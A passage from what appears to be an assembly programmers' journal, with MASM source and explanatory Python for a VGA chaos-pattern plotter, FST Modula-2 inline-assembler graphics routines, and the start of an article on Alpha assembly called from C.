;x<-x'
         MOV DWORD PTR DS:[kax],EBX

     Reasonably efficient, and we come out with the x,y coordinate pair
also in EBX,ECX.
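
     The same step can be modelled in Python to experiment with values
before touching the assembler. This is a sketch under the assumption that
all four values are unsigned 32-bit fractions; the function name is not
part of the program.

```python
# Sketch: one iteration of x' = x*x + y + a, y' = b - x on 32-bit
# fractions, following the register code step by step.
MASK32 = 0xFFFFFFFF


def step(x, y, a, b):
    """Return (x', y') for 32-bit fixed-point x, y, a, b."""
    y_new = (b - x) & MASK32        # SUB EBX,EAX      (b - x mod 1)
    hi = (x * x) >> 32              # MUL EAX, high dword in EDX
    x_new = (y + a + hi) & MASK32   # ADD EBX,[kaa] / ADD EBX,EDX
    return x_new, y_new


x1, y1 = step(0x80000000, 0x10000000, 0x20000000, 0x40000000)
print(hex(x1), hex(y1))
```

     Only the high dword of the product is kept, so the low 32 binary
places of x*x are discarded on every step. That truncation is the loss
of accuracy the comment in the code wonders about.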

     To jazz things up a little, instead of the basic idea:-
         (i)   set some random x,y,a,b
         (ii)  do our function on the x,y,a,b
         (iii) plot point on the screen representing x,y
         (iv)  go back to (ii)

     We implement a "trail". This is basically where we keep a store of
the last so many points drawn  (remember that classic WORM game??).
Then one end is added to and the other is deleted from. Points are all
plotted with XOR, especially since doing a second XOR will erase a
plotted point (so there is no erase routine).
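
     A rough Python model of the trail may help to see why no erase
routine is needed. It is a sketch only: a set of lit points stands in
for the screen, and an empty slot is marked with None where the program
itself uses the [kaera] flag. The class and method names are invented.

```python
# Sketch: a fixed-length trail where plotting and erasing are the same
# XOR operation. The set "lit" stands in for video memory.
class Trail:
    def __init__(self, length):
        self.store = [None] * length   # last "length" points drawn
        self.pos = 0                   # next slot to overwrite
        self.lit = set()               # points currently visible

    def _xor_plot(self, point):
        self.lit ^= {point}            # toggles the point on or off

    def add(self, point):
        old = self.store[self.pos]
        if old is not None:            # store has wrapped: unplot the tail
            self._xor_plot(old)
        self.store[self.pos] = point
        self.pos = (self.pos + 1) % len(self.store)
        self._xor_plot(point)          # plot the new head


trail = Trail(3)
for p in [(0, 0), (1, 1), (2, 2), (3, 3)]:
    trail.add(p)
print(sorted(trail.lit))
```

     After the fourth point the oldest one has vanished again. One side
effect of XOR plotting: a point that is in the trail twice is toggled
off while both copies are live.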

     Furthermore for every point, 4-reflections of the point are plotted
to the screen. This gives you symmetry for free.


The plot routine
~~~~~~~~~~~~~~~~
     I'm going to first explain the plot routine before going into the
main code body. I had some fun writing it, but it also illustrates some
important points.

     We are using mode 011h. This is 640x480x2, ( 0280hx01E0h )

     With mode 011h you have of course only the one plane. You've got
bytes from +00h to +04Fh on each row representing 8-bit pixel groups.

     So given an x coordinate you need to take the 2 parts:-

         offset =x SHR 3
         bit    =x AND 7

     The y coordinate is just the one part, the offset:-

         offset =y *050h           (row=050h bytes)

     Now of course it is plain to see that the offset is simply the result
of multiplication by 5 and then shift left 4. (unless you work always in
decimal, ala 050h=5*010h)

     Oh, I LOVE the x86:-

         LEA SI,[EDX*4+EDX]

     This puts DX*5 straight into SI. That's about 5 operations all in one
go:)

     So then SI is shifted 4 left and the resultant offset y*050h is the y
component of the offset on screen of the pixel we want to plot.
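
     The address arithmetic so far can be checked with a few lines of
Python. This is a sketch with made-up function names, assuming the
leftmost pixel of a byte is its most significant bit; it uses the low
three bits of x as the bit number.

```python
# Sketch: byte offset and bit mask of a pixel in mode 011h (80 bytes
# per row, 8 pixels per byte).
def row_offset(y):
    """y*050h done as (y*4 + y) shifted left by 4, kept to 16 bits."""
    return ((y * 4 + y) << 4) & 0xFFFF


def pixel_address(x, y):
    """Return (offset into segment 0A000h, bit mask within the byte)."""
    offset = row_offset(y) + (x >> 3)   # x SHR 3 selects the byte
    mask = 0x80 >> (x & 7)              # low 3 bits select the bit
    return offset, mask


print(pixel_address(10, 1))      # second row, second byte, third bit
print(pixel_address(639, 479))   # bottom right corner of the screen
```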

     The routine keeps the x/y components apart because we want to plot
(x,y) (-x,y) (-x,-y) (x,-y). And as soon as they are put together for
one they need to be disassembled/reconstructed for the next.

     The x component, which is always in BX, is obviously created with
a shift right 3, however we first have to rescue the least significant
3 bits. They give the bit in the byte.

         MOV CL,BL
         MOV AX,0180h
         ROR AL,CL;ROL AH,CL

     Here I am getting AL with the bit set that corresponds to the pixel
on screen. AH is being set up the opposite way around. Think of the screen
as four quadrants:-

                     |
              x+     |    x-
                 y+  |
                     |
          -----------+-------------
                     |
                     |
                 y-  |
                     |
                     |

     If our point starts in the x+y+ quadrant, we have the values to
draw that:-

       ( SHR BX,3  )

         XOR [SI+BX],AL

     Now to reflect the point x-wise, so it goes to x-y+, you only need
to get the x offset = 04Fh-x. Well x86 lets you do powerful things,
we don't need to mess; just negate BX to get the -x and add the 04Fh
in as a displacement. Of course the bit offset gets negated as well,
which is exactly why we have the two opposite masks in AL/AH:-

         NEG BX;XOR [SI+BX+04Fh],AH

     Next y is reflected, so we go to -x-y. This is the same thing
again, only the y coordinate will only affect the offset:-

         NEG SI;XOR [SI+BX+04Fh+01DFh*050h],AH

     And finally to +x-y:

         NEG BX;XOR [SI+BX+01DFh*050h],AL
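
     To convince yourself that the negate-and-displace trick really
lands on the mirrored pixels, the four address calculations can be
modelled and compared against a straightforward computation. The Python
below is a sketch only; both function names are invented, and the 16-bit
wraparound of SI and BX is imitated with a mask.

```python
# Sketch: the four (offset, mask) pairs touched by the 4-way plot,
# compared with a direct calculation for the mirrored coordinates.
def rot8(value, count, left):
    """8-bit rotate, as ROL/ROR do on AL and AH."""
    count &= 7
    if left:
        return ((value << count) | (value >> (8 - count))) & 0xFF
    return ((value >> count) | (value << (8 - count))) & 0xFF


def plo4_targets(x, y):
    si = ((y * 5) << 4) & 0xFFFF          # LEA SI,[EDX*4+EDX] / SHL SI,4
    al = rot8(0x80, x, left=False)        # ROR AL,CL  mask for +x
    ah = rot8(0x01, x, left=True)         # ROL AH,CL  mask for -x
    bx = x >> 3                           # SHR BX,3
    out = [((si + bx) & 0xFFFF, al)]
    bx = -bx                              # NEG BX
    out.append(((si + bx + 0x4F) & 0xFFFF, ah))
    si = -si                              # NEG SI
    out.append(((si + bx + 0x4F + 0x1DF * 0x50) & 0xFFFF, ah))
    bx = -bx                              # NEG BX
    out.append(((si + bx + 0x1DF * 0x50) & 0xFFFF, al))
    return out


def direct(x, y):
    """Plain offset and mask for pixel (x, y)."""
    return (y * 80 + (x >> 3), 0x80 >> (x & 7))


x, y = 13, 7
print(plo4_targets(x, y))
print([direct(x, y), direct(639 - x, y),
       direct(639 - x, 479 - y), direct(x, 479 - y)])
```

     Both lines print the same four pairs, i.e. the reflections are the
pixels (x,y), (639-x,y), (639-x,479-y) and (x,479-y).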


Notes
~~~~~
     During the program run you can press any key to set different values
for the chaos function. Press ESC to abort. On abortion a message will
give you 2 hex d-words, these are the random number seed that generated
the last pattern you were watching. To see it again simply record the
values and invoke the program with the values on the command line:-

(ESC abort)

random seed=01234567 FEDCBA98      (program output)

KAOS 01234567 FEDCBA98             (invoke program with seed as parameter)

(chaos pattern displayed is the same as the one broken out of)

     The code is left undelayed and as such it may run too fast on a fast
machine. The optimum speed is for it to be only slightly over-fast. If
you want to achieve this you should add some sort of delay loop in.
Alternatively just get out your old 386 and give it some work to do.

     Code is, as usual, in MASM format. Assemble to a COM file.

========START OF CODE======================================================

OPTION SCOPED
OPTION SEGMENT:USE16
.486

stksiz      EQU 0400h       ;stack size

kadatx      EQU 0C00h       ;#points length of trail

cseg SEGMENT BYTE

ASSUME NOTHING
ORG 0100h

kode PROC NEAR

;initialise, allocate memory and stack
         CLD
         MOV AH,04Ah
         MOV BX,OFFSET endof+0Fh
         SHR BX,4
         INT 021h
         JC errmem
         MOV SP,OFFSET stk+stksiz
;zero-terminate command line to facilitate
;parsing
         MOV SI,080h
         LODSB
         CBW
         XCHG BX,AX
         MOV [BX+SI],BH

;any parameters given?
         CALL NEAR PTR scaws
         CMP AL,0
         JZ SHORT ko0

;yes, so read 2 dwords as random seed
         MOV DI,OFFSET rndn
         MOV AL,010h
         CALL NEAR PTR scanur
         CALL NEAR PTR scanu
         JNA erripa
         STOSD
         CALL NEAR PTR scaws
         CALL NEAR PTR scanu
         JNA erripa
         STOSD
         JMP SHORT ko1

;no, so set random seed from system time
ko0:    CALL NEAR PTR rndseed
ko1:


lop2:

;set mode 011h, fade grey background
         MOV AX,011h
         INT 010h
         MOV EAX,040404h
         MOV BL,0
         CALL NEAR PTR spal

;save random seed so that kaos params can be restored
;by user
         MOV SI,OFFSET rndn
         MOV DI,OFFSET seed
         MOVSD;MOVSD

;set random params for function
         MOV DI,OFFSET kaa
         MOV CX,4
         lop1:
         CALL NEAR PTR rndgen32
         STOSD
         LOOP lop1

;initialise for plot trail
;   [kaera]=0 on the first pass of the store
;   [kaera]=-1 thereafter
;   [kaoff]=offset of store pointer

         MOV BYTE PTR DS:[kaera],0
         MOV WORD PTR DS:[kaoff],OFFSET kadat

lop0:

;iterate x,y
;   x'=x*x+y+a
;   y'=b-x
         MOV EAX,DWORD PTR DS:[kax]
         MOV EBX,DWORD PTR DS:[kab]
         SUB EBX,EAX
         MOV ECX,EBX
         XCHG EBX,DWORD PTR DS:[kay]
         ADD EBX,DWORD PTR DS:[kaa]
         MUL EAX
         ADD EBX,EDX
         MOV DWORD PTR DS:[kax],EBX

;x,y scale to screen bounds
;  gets the x,y [0,1) values into screen coordinate pair (BX,DX)
         SHR EBX,12
         LEA EBX,[EBX*4+EBX]
         SHR EBX,13

         MOV EDX,ECX
         SHR ECX,4
         SUB EDX,ECX
         SHR EDX,23

;do point
;  [kaera] is -1 on and after the store has become full for the first
;          time
         MOV DI,WORD PTR DS:[kaoff]
         TEST BYTE PTR DS:[kaera],-1
         JZ SHORT ko3
;unplot trail end point
         PUSH BX
         PUSH DX
         MOV BX,[DI]
         MOV DX,[DI+2]
         CALL NEAR PTR plo4
         POP DX
         POP BX

;current position is saved in store
ko3:    MOV AX,BX
         STOSW
         MOV AX,DX
         STOSW
;store ptr incremented wrapping at the end
         CMP DI,OFFSET kadat+kadatx*4
         JNZ SHORT ko4
         MOV DI,OFFSET kadat
         OR BYTE PTR DS:[kaera],-1

ko4:    MOV WORD PTR DS:[kaoff],DI

;current position is plotted
         CALL NEAR PTR plo4

;user
;  ESC aborts, any key sets a new function going
         MOV AH,0Bh
         INT 021h
         CMP AL,0
         JZ lop0

         MOV AH,7
         INT 021h
         CMP AL,01Bh
         JNZ lop2

;display random seed value and terminate
         MOV SI,OFFSET t0
         CALL NEAR PTR pstr
         MOV EAX,02083010h
         CALL NEAR PTR nuconvs
         MOV SI,OFFSET seed

;those instructions at the program start are never going to be
;executed again so use them as a temp workspace instead of kadat
;which could possibly be dangerous if somebody EQU's kadatx to
;some low value
         MOV DI,0100h
         PUSH DI
         LODSD
         CALL NEAR PTR nuconv
         MOV AL,020h
         STOSB
         LODSD
         CALL NEAR PTR nuconv
         MOV AL,0
         STOSB
         POP SI
         CALL NEAR PTR pstrcr

;screen mode is not put back to 02h you may wish to add
;a MOV AX,2;INT 010h here however I left it out because I
;see way too much of that mode

;program termination
terminat0:
         MOV AL,0
terminat:
         MOV AH,04Ch
         INT 021h

;error aborts
erripa:
         MOV SI,OFFSET terripa
         MOV AL,2
         JMP SHORT err
errmem:
         MOV SI,OFFSET terrmem
         MOV AL,1
err:
         PUSH SI
         MOV SI,OFFSET terr
         CALL NEAR PTR pstr
         POP SI
         CALL NEAR PTR pstrcr
         JMP terminat

terr:   DB "ERROR: ",0
terrmem:
         DB "memory allocation failure",0
terripa:
         DB "invalid parameter format",0

;program text (in its entirety)
t0:     DB "random seed=",0

kode ENDP

;plo4-    4-way plot routine for mode 011h
;
;         plots 4 reflections of a single point on the mode 011h
;         screen these are (x,y) (-x,y) (-x,-y) (x,-y)
;
;         plots using XOR
;
;entry:   BX,DX=x,y coordinates
;
;exit:    SI,CL,AX,BX destroyed

plo4 PROC NEAR

         PUSH DS

;screen segment 0A000h
; for further comment please refer above
         PUSH 0A000h
         POP DS
         LEA SI,[EDX*4+EDX]
         SHL SI,4
         MOV CL,BL
         MOV AX,0180h
         ROR AL,CL
         ROL AH,CL
         SHR BX,3
         XOR [SI+BX],AL
         NEG BX
         XOR [SI+BX+04Fh],AH
         NEG SI
         XOR [SI+BX+04Fh+01DFh*050h],AH
         NEG BX
         XOR [SI+BX+01DFh*050h],AL
         POP DS
         RET

plo4 ENDP

;if you don't like my fade grey background you can delete this and
;the line that invokes it. However this is also the next library
;routine, so do cut/paste it into a file it will be used in future
;articles.

;spal-  set VGA DAC register via hardware
;entry: EAX=XXBBGGRR  (hex of course)
;
;           RR=red component   (low byte, sent to the DAC first)
;           GG=green component
;           BB=blue component
;
;       don't forget that these values are <=03Fh
;
;       BL=DAC register to set
;
;
;exit:  (all registers are preserved)

spal PROC NEAR

;the code here is straightforward so I shall add no comment apart
;from a small moan:( I have used direct hardware access instead
;of the BIOS calls to affect the palette since square one, I'm
;not unreasonable in my desire to program the hard-metal of the machine,
;however the quality of the BIOS graphics routines is absolutely
;despicable. If you've ever tried using them you will know what I'm
;talking about.
;
         PUSH EAX
         PUSH DX
         MOV DX,03C8h
         CLI
         XCHG BX,AX
         OUT DX,AL
         INC DX
         XCHG BX,AX
         OUT DX,AL
         SHR EAX,8
         OUT DX,AL
         SHR EAX,8
         OUT DX,AL
         STI
         POP DX
         POP EAX
         RET

spal ENDP

;library routines
         INCLUDE RAND.ASM
         INCLUDE SCAWS.ASM
         INCLUDE SCANU.ASM
         INCLUDE NUCONV.ASM

         INCLUDE PSTR.ASM
         INCLUDE PSTRCR.ASM
         INCLUDE PSTRCX.ASM
         INCLUDE OUTCR.ASM
         INCLUDE STRLEN.ASM
         INCLUDE PUTCH.ASM
;data

kaoff   EQU $                   ;(w)  offset of trail store pointer (absolute)
kaera   EQU kaoff+2             ;(b)  flag indicating 1st trail pass
kaa     EQU kaera+1             ;(dw) a
kab     EQU kaa+4               ;(dw) b   kaos function parameters
kax     EQU kab+4               ;(dw) x
kay     EQU kax+4               ;(dw) y
kadat   EQU kay+4               ;(*)  store space for trail data
seed    EQU kadat+kadatx*4      ;(qw) copy of initial random number seed
stk     EQU seed+8              ;(*)  stack space
endof   EQU stk+stksiz          ;[endofprogram]

cseg ENDS

END FAR PTR kode

========END OF CODE========================================================
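
     One step in the listing that is easy to read past is the scaling
of the [0,1) values to screen coordinates (the SHR/LEA/SHR and
SHR/SUB/SHR sequences after "x,y scale to screen bounds"). The Python
sketch below mirrors those instructions; the function name is invented
and the inputs are assumed to be unsigned 32-bit fractions.

```python
# Sketch: scaling 32-bit fractions to 640x480 with shifts only.
#   x * 640 / 2^32 = ((x >> 12) * 5) >> 13      since 640 = 5 * 2^7
#   y * 480 / 2^32 = (y - (y >> 4)) >> 23       since 480 = 15 * 2^5
def to_screen(x, y):
    bx = ((x >> 12) * 5) >> 13      # SHR EBX,12 / LEA / SHR EBX,13
    dx = (y - (y >> 4)) >> 23       # SHR ECX,4 / SUB EDX,ECX / SHR EDX,23
    return bx, dx


print(to_screen(0x80000000, 0x80000000))   # the value 0.5 on both axes
print(to_screen(0xFFFFFFFF, 0xFFFFFFFE))   # close to the far corner
```

     In this model the single input y=0FFFFFFFFh comes out as row 480,
one past the last visible row, because y - (y SHR 4) is then exactly
0F0000000h. Every other y value stays within 0 to 479.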














::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                    Inline Assembler With Modula
                                                    by Jan Verhoeven


I don't want to start a compiler war in the assembler programmer's journal,
but I do want to show some nice in-line assembly routines for FST Modula-2.
FST (or Fitted Software Tools) was a shareware Modula-2 compiler made by
Roger Carvalho. He eventually gave up the concept of shareware and made his
final version freeware. If you look carefully you can find this package in
many software repositories like Simtel. Also the FreeDOS website used to
harbor this final version.

For this Modula-2 compiler I used my VGA routines (see previous issues) and
some in-line assembly to give this compiler a way to do graphics modes.

I uploaded the full sources to SimTel some months (or years?) ago, so if you
would like to have a detailed look at it, go there and look for it.

Modula-2 is despised by many, but it is the most structured language ever
made. And that's also probably the reason why most coders refuse to use it.
You must follow the compiler, whatever you do. A high price, but the result
is that Modula-2 programs seldom crash. They can bail out in the middle of
the program, but they will not hang due to a pointer or indexing error.

Anyway, here's my addition to this marvelous language:

---------------------------------------------------------------------------
IMPLEMENTATION MODULE VgaLib;

PROCEDURE   SHL (x, y : CARDINAL) : CARDINAL;   (*  Shift left x, y bits.  *)

VAR result  : CARDINAL;

BEGIN
     ASM
         MOV  AX, x
         MOV  CX, y
         AND  CX, 15         (* Keep lower nybble only   *)
         JCXZ ok             (* Get out if no shift.     *)
         SHL  AX, CL
     ok: MOV  result, AX     (* Store result.    *)
     END;
     RETURN result;
END SHL;

---------------------------------------------------------------------------
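
What the routine returns can be stated in a few lines of Python. This is
only a model with an invented name, assuming CARDINAL is an unsigned
16-bit value as it is in this compiler's in-line code above:

```python
# Sketch: result of the SHL procedure for 16-bit CARDINAL arguments.
def shl16(x, y):
    count = y & 15                  # AND CX, 15 keeps the low nybble
    return (x << count) & 0xFFFF    # SHL AX, CL on a 16-bit register


print(shl16(1, 4))        # 16
print(shl16(0x8001, 1))   # top bit falls off, leaving 2
print(shl16(3, 16))       # count is masked to 0, so x comes back as is
```

Since a shift by zero leaves AX unchanged anyway, the JCXZ only saves
the shift instruction; it does not change the result.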

The only "drawback" is that the in-line code must be 8088 style. So you
won't be able to use MMX instructions, but almost no-one ever needs those.

FST Modula-2 offers direct access to (values of) variables. Neat. Makes the
in-line feature very convenient to use.

---------------------------------------------------------------------------

PROCEDURE   SetColour (Colour : CHAR);  (*  Define colour to work with.  *)

BEGIN
     ASM
         MOV  DX, 03C4H          (* VGA sequencer port   *)
         MOV  AH, Colour
         MOV  AL, 2
         OUT  DX, AX
     END;
END SetColour;
---------------------------------------------------------------------------
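
The single OUT DX, AX does two jobs at once: AL goes to the index port
and AH to the data port next to it. A small Python sketch of that idiom
follows; the function names are invented, and it assumes index 2 of the
sequencer at 03C4H is the map mask register.

```python
# Sketch: the two byte writes hidden in one 16-bit OUT to the VGA.
def out_word(port, ax):
    """OUT DX,AX seen as byte writes: AL to port, AH to port + 1."""
    return [(port, ax & 0xFF), (port + 1, (ax >> 8) & 0xFF)]


def set_colour_writes(colour):
    """Writes issued by SetColour: select index 2, then store colour."""
    ax = ((colour & 0xFF) << 8) | 0x02   # AH = Colour, AL = 2
    return out_word(0x3C4, ax)


for port, value in set_colour_writes(0x0F):
    print(hex(port), hex(value))
```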

Compare the following routine with the one I entered for the VGA-12h code in
A86 assembly language format. There's some Modula-2 overhead, but the actual
plotting is done in ASM, for speed-reasons.

---------------------------------------------------------------------------
PROCEDURE   Plot (VAR InWin : WinData);     (*  Plot point on CurX, CurY. *)

VAR x, y    : CARDINAL;

BEGIN
     x := InWin.CurX + InWin.TopX;
     y := InWin.CurY + InWin.TopY;

     ASM
         MOV  AX, 0A000H
         MOV  ES, AX         (* Set up segment register *)
         MOV  CX, x
         AND  CX, 7          (* Which bit to plot? *)
         MOV  AH, 80H
         SHR  AH, CL         (* Compose plotting mask *)
         MOV  AL, 8
         MOV  DX, 03CEH
         OUT  DX, AX         (* Set plottingmask *)
         MOV  AX, y          (* Calculate offset in Video RAM *)
         MOV  BX, AX
         ADD  AX, AX
         ADD  AX, AX
         ADD  AX, BX         (* AX := 5 * Y *)
         MOV  CL, 4
         SHL  AX, CL         (* AX := 16 * 5 * Y *)
         MOV  BX, x
         SHR  BX, 1
         SHR  BX, 1
         SHR  BX, 1
         ADD  BX, AX         (* plus X / 8 *)
         MOV  AL, ES:[BX]
         MOV  AL, 0FFH
         MOV  ES:[BX], AL    (* and plot it *)
     END;
END Plot;


PROCEDURE   DrawH (VAR InWin : WinData; Flag : BOOLEAN);
     (*  Draw a horizontal line from CurX, CurY for DeltaX pixels. *)

VAR Index, Stop, x, dx, y, Kval             : CARDINAL;
     Emask, Lmask, Val                       : CHAR;

BEGIN
     IF Flag THEN        (* Flag = TRUE => Plot, else UnPlot *)
         Val := 0FFX;
     ELSE
         Val := 0X;
     END;
     IF InWin.DeltaX < 18 THEN
         FOR Index := 0 TO InWin.DeltaX DO       (* For short lines *)
             Plot (InWin);
             INC (InWin.CurX);
         END;
     ELSE
          x := InWin.TopX + InWin.CurX;          (* For long lines *)
          y := InWin.TopY + InWin.CurY;
         dx := InWin.DeltaX;
         ASM
             MOV  AX, 0A000H
             MOV  ES, AX         (* Set up segment register *)
             MOV  CX, x
             AND  CX, 7
             MOV  BX, 8
             SUB  BX, CX
             MOV  AL, 0FFH
             SHR  AL, CL
             MOV  Emask, AL      (* compose plotting mask *)
             MOV  CX, dx
             SUB  CX, BX
             MOV  AX, CX
             AND  AX, 7
             PUSH AX             (* Save L-val *)
             SUB  CX, AX
             SHR  CX, 1
             SHR  CX, 1
             SHR  CX, 1
             MOV  Kval, CX
             MOV  AL, 0
             POP  CX             (* retrieve L-val *)
             JCXZ L0
             MOV  AL, 080H
         L0: DEC  CX
             SAR  AL, CL
             MOV  Lmask, AL

             MOV  AX, y              (* Calculate offset in Video RAM *)
             MOV  BX, AX
             ADD  AX, AX
             ADD  AX, AX
             ADD  AX, BX             (* AX := 5 * Y *)
             MOV  CL, 4
             SHL  AX, CL             (* AX := 16 * 5 * Y *)
             MOV  BX, x
             SHR  BX, 1
             SHR  BX, 1
             SHR  BX, 1
             ADD  BX, AX             (* plus X / 8 *)

             MOV  AH, Emask
             MOV  DX, 03CEH
             MOV  AL, 8
             OUT  DX, AX             (* Set plotting mask *)

             MOV  AL, Val
             MOV  AH, ES:[BX]
             MOV  ES:[BX], AL        (* Do the plotting ... *)

             INC  BX
             MOV  CX, Kval
             JCXZ L2
             MOV  AX, 0FF08H
             OUT  DX, AX
             MOV  AH, Val
         L1: MOV  AL, ES:[BX]
             MOV  ES:[BX], AH
             INC  BX
             LOOP L1
         L2: MOV  AH, Lmask
             MOV  AL, 8
             OUT  DX, AX
             MOV  AL, ES:[BX]
             MOV  AL, Val
             MOV  ES:[BX], AL
         END;
         INC (InWin.CurX, dx);
     END;
END DrawH;


PROCEDURE   PlotChar (VAR InWin : WinData; Letter : CHAR);
             (*  Plot character on InWin.(CurX,CurY).    *)

VAR xpos, ypos, MapOfs, VGApos, VGAseg, Pmask       : CARDINAL;
     Cval                                            : CHAR;

BEGIN
     IF Letter = 0AX THEN
         INC (InWin.CurY, 16);           (* Process LF *)
         RETURN;
     END;
     IF Letter = 0DX THEN
         InWin.CurX := InWin.Indent;     (* Process CR *)
         RETURN;
     END;
     IF InWin.CurX >= InWin.Width - ChrWid THEN
         InWin.CurX := InWin.Indent;
         INC (InWin.CurY, 16);
     END;
     xpos := InWin.CurX + InWin.TopX;
     ypos := InWin.CurY + InWin.TopY;
     VGApos := 80 * ypos + SHR (xpos, 3);
     VGAseg := 0A000H;
     MapOfs := ORD (Letter) * 16;
     ASM
         PUSH ES             (* save ES *)
         MOV  CX, xpos
         AND  CX, 7
         MOV  Cval, CL       (* nr of bits "off center" *)
         MOV  BX, 0FF00H
         SHR  BX, CL
         MOV  Pmask, BX      (* mask to use for left and right halves *)
         MOV  AX, BX
         MOV  AL, 8
         MOV  DX, 03CEH
         OUT  DX, AX         (* set plotting mask for left part *)
         MOV  CX, 16
         MOV  BX, VGApos
         LES  SI, BitMap     (* here are the pixels that make the tokens *)
         ADD  SI, MapOfs
     L0: PUSH CX
         LES  AX, BitMap     (* load ES, AX is just scrap *)
         MOV  AH, ES:[SI]    (* load pattern *)
         MOV  CL, Cval
         SHR  AX, CL         (* compose left half *)
         MOV  ES, VGAseg
         MOV  AL, ES:[BX]
         MOV  ES:[BX], AH    (* and "print" it *)
         ADD  BX, 80         (* point to next row *)
         INC  SI             (* and next pixel pattern *)
         POP  CX
         LOOP L0             (* repeat until done *)
         MOV  AX, Pmask
         CMP  AL, 0          (* if Cval = 0 => perfect alignment *)
         JE   ex             (*   skip second half *)
         XCHG AH, AL         (* else repeat the story once more *)
         MOV  AL, 8
         OUT  DX, AX         (* set up mask for right half *)
         MOV  CX, 16
         SUB  BX, 1279       (* 16 x 80 - 1 *)
         SUB  SI, CX
     L1: PUSH CX
         LES  AX, BitMap
         MOV  AH, ES:[SI]
         MOV  AL, 0
         MOV  CL, Cval
         SHR  AX, CL
         MOV  ES, VGAseg
         MOV  AH, ES:[BX]
         MOV  ES:[BX], AL
         ADD  BX, 80
         INC  SI
         POP  CX
         LOOP L1
     ex: POP  ES
     END;
     INC (InWin.CurX, ChrWid);   (* point to next printing position *)
END PlotChar;
---------------------------------------------------------------------------
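
The mask arithmetic in the long-line branch of DrawH is the least
obvious part of the listing. The Python sketch below models how the line
is split into a left edge byte, a run of full bytes and a right edge
byte. It is an illustration only: the function name is invented, and it
assumes dx is at least 8 so that the line reaches past the first byte
(the routine only takes this branch for DeltaX of 18 or more).

```python
# Sketch: the three pieces DrawH computes for a long horizontal line.
def drawh_masks(x, dx):
    shift = x & 7                   # AND CX, 7
    first = 8 - shift               # pixels covered by the first byte
    emask = 0xFF >> shift           # Emask: left edge
    rest = dx - first               # pixels left after the first byte
    last = rest & 7                 # L-val: pixels in the final byte
    kval = (rest - last) >> 3       # Kval: number of full bytes
    lmask = (0xFF00 >> last) & 0xFF # Lmask: top "last" bits set
    return emask, kval, lmask


emask, kval, lmask = drawh_masks(3, 20)
print(hex(emask), kval, hex(lmask))
```

For x = 3 and dx = 20 this gives 5 pixels in the first byte, one full
byte and 7 pixels in the last byte, 20 in total.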

And here is the promised solution for the "make a box-drawing routine"
problem of the previous issue. OK, the solution is in Modula-2, but since
this is such a clear to understand language it will be no big deal to port
this code to assembly language format.

---------------------------------------------------------------------------
PROCEDURE   MakeBox (InWin : WinData);
             (*  Make a box on screen starting at (TopX, TopY).  *)
BEGIN
     InWin.CurX := 0;
     InWin.CurY := 0;                        (* Make sure pointers are correct *)
     InWin.DeltaX := InWin.Width - 1;
     InWin.DeltaY := InWin.Height - 1;       (* setup parameters for drawing lines *)
     SetColour (InWin.BoxCol);
     DrawH (InWin, TRUE);                    (* draw horizontal line *)
     DrawV (InWin);                          (* draw vertical line   *)
     InWin.CurX := 0;
     InWin.CurY := 1;                        (* adjust coordinates   *)
     DrawV (InWin);                          (* draw last vertical line  *)
     DEC (InWin.CurY);
     INC (InWin.CurX);                       (* adjust coordinates once more *)
     DrawH (InWin, TRUE);                    (* draw final line  *)
END MakeBox;

END VgaLib.
---------------------------------------------------------------------------
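
For readers who would rather port from C than from Modula-2, here is a minimal
sketch of the same idea: a box outline built from two horizontal and two
vertical line draws. DrawH and DrawV are not shown in this excerpt, so
draw_h(), draw_v(), the character grid and its size are hypothetical stand-ins.
Note also that this sketch passes absolute coordinates instead of moving a
cursor inside a window record as MakeBox does.

```c
#include <stdio.h>
#include <string.h>

#define GRID_W 12   /* hypothetical canvas size, not taken from VgaLib */
#define GRID_H 6

static char grid[GRID_H][GRID_W + 1];

/* Fill the canvas with blanks and terminate every row. */
void clear_grid(void)
{
    for (int y = 0; y < GRID_H; y++) {
        memset(grid[y], ' ', GRID_W);
        grid[y][GRID_W] = '\0';
    }
}

/* Draw len cells to the right, starting at (x, y). */
void draw_h(int x, int y, int len)
{
    for (int i = 0; i < len; i++)
        grid[y][x + i] = '#';
}

/* Draw len cells downward, starting at (x, y). */
void draw_v(int x, int y, int len)
{
    for (int i = 0; i < len; i++)
        grid[y + i][x] = '#';
}

/* Outline a width x height box with its top-left corner at (left, top).
   The caller must keep the box inside the grid. */
void make_box(int left, int top, int width, int height)
{
    draw_h(left, top, width);                  /* top edge    */
    draw_v(left, top, height);                 /* left edge   */
    draw_v(left + width - 1, top, height);     /* right edge  */
    draw_h(left, top + height - 1, width);     /* bottom edge */
}

/* Print the canvas row by row. */
void print_grid(void)
{
    for (int y = 0; y < GRID_H; y++)
        puts(grid[y]);
}
```

Calling clear_grid(), make_box(1, 1, 5, 3) and print_grid() in that order
prints a 5 x 3 outline with an empty interior.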











::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                  Assembly on the Alpha Platform
                                                  by Rudolf Seemann


ASSEMBLING ON ALPHA PART I
--------------------------
In this first article I will show how to call functions written in Alpha
assembler from a program written in C. The example I give is a rather simple
one. There are many things to know about the Alpha, but this text shows that
using assembler on it is quite simple.

Introduction
------------
The heart of the Alpha architecture is a 64-bit RISC processor with 32 integer
registers ($0 to $31) and 32 floating point registers ($f0 to $f31). Its
operation codes can be classified by the form of their operands:
   class     opcode
   operate   opcode Ra,Rb,Rc     # Ra operation Rb -> Rc
             opcode Ra,number,Rc # Ra operation number (0-255) -> Rc
   memory    opcode Ra,Disp(Rb)  # load/store register Ra from/to the memory
                                 # address Rb + offset Disp
   branch    opcode Ra,label     # branch to label if the test on Ra is true
   PAL       opcode number       # opcodes for the operating system
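
To make the classes above a little more concrete, here is a small C sketch
that pulls the fields out of a 32-bit instruction word. The bit positions are
the ones I remember from the Alpha architecture documentation (opcode in the
top six bits, an 8-bit literal for the "number" form of operate instructions),
so please check them against the handbook before relying on them. All function
names are made up for this example.

```c
#include <stdint.h>
#include <stdio.h>

/* Fields shared by several instruction classes. */
unsigned alpha_opcode(uint32_t w) { return w >> 26; }           /* bits 31..26 */
unsigned alpha_ra(uint32_t w)     { return (w >> 21) & 0x1f; }  /* bits 25..21 */
unsigned alpha_rb(uint32_t w)     { return (w >> 16) & 0x1f; }  /* bits 20..16 */

/* Operate class. */
unsigned alpha_rc(uint32_t w)          { return w & 0x1f; }         /* bits 4..0   */
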